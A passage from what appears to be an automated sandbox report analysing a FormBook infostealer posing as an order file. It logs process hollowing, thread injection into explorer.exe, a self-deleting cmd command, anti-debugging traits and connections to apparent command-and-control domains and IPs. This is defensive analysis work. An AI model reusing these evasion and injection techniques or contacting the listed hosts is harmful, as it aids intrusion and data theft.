Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D51B8F mov eax, dword ptr fs:[00000030h]		15_2_00D51B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DFD380 mov ecx, dword ptr fs:[00000030h]		15_2_00DFD380
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E0138A mov eax, dword ptr fs:[00000030h]		15_2_00E0138A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D74BAD mov eax, dword ptr fs:[00000030h]		15_2_00D74BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D74BAD mov eax, dword ptr fs:[00000030h]		15_2_00D74BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D74BAD mov eax, dword ptr fs:[00000030h]		15_2_00D74BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E18F6A mov eax, dword ptr fs:[00000030h]		15_2_00E18F6A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4F358 mov eax, dword ptr fs:[00000030h]		15_2_00D4F358
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4DB40 mov eax, dword ptr fs:[00000030h]		15_2_00D4DB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5EF40 mov eax, dword ptr fs:[00000030h]		15_2_00D5EF40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D73B7A mov eax, dword ptr fs:[00000030h]		15_2_00D73B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D73B7A mov eax, dword ptr fs:[00000030h]		15_2_00D73B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D4DB60 mov ecx, dword ptr fs:[00000030h]		15_2_00D4DB60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D5FF60 mov eax, dword ptr fs:[00000030h]		15_2_00D5FF60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E18B58 mov eax, dword ptr fs:[00000030h]		15_2_00E18B58
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D6F716 mov eax, dword ptr fs:[00000030h]		15_2_00D6F716
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDFF10 mov eax, dword ptr fs:[00000030h]		15_2_00DDFF10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00DDFF10 mov eax, dword ptr fs:[00000030h]		15_2_00DDFF10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7A70E mov eax, dword ptr fs:[00000030h]		15_2_00D7A70E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7A70E mov eax, dword ptr fs:[00000030h]		15_2_00D7A70E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D7E730 mov eax, dword ptr fs:[00000030h]		15_2_00D7E730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E1070D mov eax, dword ptr fs:[00000030h]		15_2_00E1070D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E1070D mov eax, dword ptr fs:[00000030h]		15_2_00E1070D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D44F2E mov eax, dword ptr fs:[00000030h]		15_2_00D44F2E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00D44F2E mov eax, dword ptr fs:[00000030h]		15_2_00D44F2E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 15_2_00E0131B mov eax, dword ptr fs:[00000030h]		15_2_00E0131B

Enables debug privileges

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.chjcsc.com
Source: C:\Windows\explorer.exe	Network Connect: 172.255.115.89 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.socialdating24.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.theglasshousenyc.com

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1280000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000005.00000000.253495727.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Queries volume information: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE